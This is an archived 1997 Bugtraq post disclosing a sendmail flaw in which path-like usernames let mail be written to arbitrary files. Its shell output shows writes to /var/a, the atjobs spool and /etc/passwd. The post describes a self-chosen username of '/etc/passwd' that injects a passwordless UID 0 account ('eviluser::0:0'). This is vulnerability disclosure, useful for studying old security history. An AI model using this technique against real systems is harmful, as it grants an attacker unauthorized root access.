Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY LINKS NEWS MAN DOCUMENTATION

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>

X-RDate: Wed, 09 Jan 1980 11:41:24 +0500 (SSK)
Date: Tue, 2 Dec 1997 17:51:24 -0500
From: Duck Vader <tiepilot@THEPOND.THEPOND.ML.ORG>
To: BUGTRAQ@NETSPACE.ORG
Subject: Sendmail quirks

        Going through my mail the other day, I noticed some junk mail from
..@somehost, and wondered what would happen if I had a user by the same
name. Well, it seems sendmail will readily write to a path in the username
as long as it doesn't begin with a forward slash. A few quick examples:

thePond:~# cat /etc/passwd | grep ../
../../a:*:519:100:tmp:/home/tmp:/bin/tcsh
thePond:~# ls -l /var/a
-rw-------   1 ../../a  users           0 Nov 23 12:14 /var/a

thePond:/var/spool# ls -ld atjobs
drwxr-xr-x   2 root     root         1024 Nov 23 11:55 atjobs
thePond:/var/spool# cat /etc/passwd | grep atjobs
../atjobs:*:520:100:tmp:/tmp:/bin/tcsh
thePond:/var/spool# ls -l
total 16
drwxr-xr-x   2 root     root         1024 Nov 23 11:55 BOGUS.EYF
-rw-------   1 ../atjob users           0 Nov 23 12:20 atjobs

Yes, you can precede the pathname with a forward slash.
thePond:~# cat /etc/passwd | grep passwd
/etc/passwd:*:515:100:tmp:/home/tmp:
thePond:~# cat /etc/passwd
root:*:0:0:root:/root:/bin/tcsh
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
[Edited out more passwords..]
>>From root Tue Nov 25 20:44:00 1997
To: /etc/passwd

eviluser::0:0:Sendmail quirks:/root:/bin/tcsh


        This probably will not be a problem for the average user. However,
BBSes and free email services often let the user select his own username,
and will add him to /etc/passwd for email and whatnot. If I ran into a
site that did this, I could just specify my login as /etc/passwd and write
myself a new username, this time with UID:GID 0:0 :)

                      *---------------------------------*
                      | tiepilot - The Duck Jedi Master |
                      |                                 |
                      |     duckvader@quackquack.com    |
                      |     tiepilot@thepentagon.com    |
                      *---------------------------------*

Never put off till tomorrow what you can avoid all together.

Hacker's Law:
        The belief that enhanced understanding will necessarily stir a
nation to action is one of mankind's oldest illusions.

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>

ПОДПИШИСЬ НА ЖУРНАЛ Linux Format 2012! Журнал "Linux Format" (Линукс Формат)- Единственный в России и странах СНГ журнал на русском языке, посвящённый Linux и свободному ПО. Журнал для IT-директоров, IT-менеджеров, программистов, системных администраторов, учителей школ и преподавателей ВУЗов и всех пользователей ПК. В каждом выпуске: Новости индустрии OpenSource, обзоры новинок свободного ПО, обучающие и методические статьи. Каждый, кто оформит подписку, получает бонусы и подарки- объёмные наклейки на системный блок, диск с архивом номеров за 2005-2011 г.г. и ежемесячно электронную версию журнала в pdf-формате. Оформить подписку на год